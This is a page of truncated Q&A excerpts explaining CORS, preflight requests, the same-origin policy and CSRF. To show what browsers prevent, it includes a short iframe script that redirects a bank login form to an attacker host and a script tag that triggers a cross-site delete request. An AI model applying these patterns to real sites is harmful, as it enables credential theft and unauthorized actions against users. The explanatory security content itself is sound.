See What is the motivation behind the introduction of preflight CORS requests?. The reason CORS doesn’t require browsers to do a preflight for application/x-www-form-urlencoded, multipart/form-data, or text/plain content types is that if it did, that’d make CORS more restrictive than what browsers have already always allowed (and it’s not the intent of CORS to put … Read more
<iframe id=”bank” src=”https://yourbank.example”></iframe> <script> window.onload = function() { document.getElementById(‘bank’).contentWindow.document.forms[0].action = ‘http://example.com’; }; </script> The JavaScript code changes the form’s action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank. If I set up a PHP script on my server that redirects … Read more
Update 2021-10-18 As of Chrome 95, on MacOS and Windows, –disable-site-isolation-trials remains a required flag in order to disable web security, so the command-line arguments to Chrome seen below are still valid. (Some of the arguments are not formally supported by Chrome, as it will warn you.) To test whether you’ve successfully launched Chrome with … Read more
Do nothing to the browser. CORS is supported by default on all modern browsers (and since Firefox 3.5). The server being accessed by JavaScript has to give the site hosting the HTML document in which the JS is running permission via CORS HTTP response headers. security.fileuri.strict_origin_policy is used to give JS in local HTML documents … Read more
Summary I had a misunderstood concepts about Same-origin policy and CORS that @Bergi, @Neil McGuigan and @SilverlightFox helped me to clarify. First of all, what @Bergi says about SOP does not prevent sending requests. It does prevent a page from accessing results of cross-domain requests. is an important concept. I thought that a browser doesn’t … Read more
window.name isn’t particularly good as a transport, as (AFAIK) it doesn’t fire any events when it’s changed. As a result, an application which was trying to use window.name as a two-way communications channel would have to poll it for updates. As far as sites that actually use it: I’ve never heard of any. There might … Read more
Unlike regular scripts, ES6 modules are subject to same-origin policy. This means that you cannot import them from the file system or cross-origin without a CORS header (which cannot be set for local files). Basically you need to run this code from a (local) server or disable same-origin in the browser for testing (do not … Read more
The important thing to note here is that if the user is signed in to a site http://example.com/ and the request http://example.com/delete?id=1 deletes a post by the user, then the following code will delete the user’s post: <script src=”http://example.com/delete?id=1″ /> This is called a CSRF/XSRF attack (cross-site request forgery). This is why most server-side web … Read more
To be more specific, it is easy to make the mistake of thinking that if evil.example cannot make a request to good.example due to CORS then CSRF is prevented. There are two problems being overlooked, however: CORS is respected by the browsers only. That means Google Chrome will obey CORS and not let evil.example make … Read more
The overwrite of the header origin is caused by Allow-Control-Allow-Origin: * chrome extension. Link to the extension Try disabling this extension in order to solve your problem.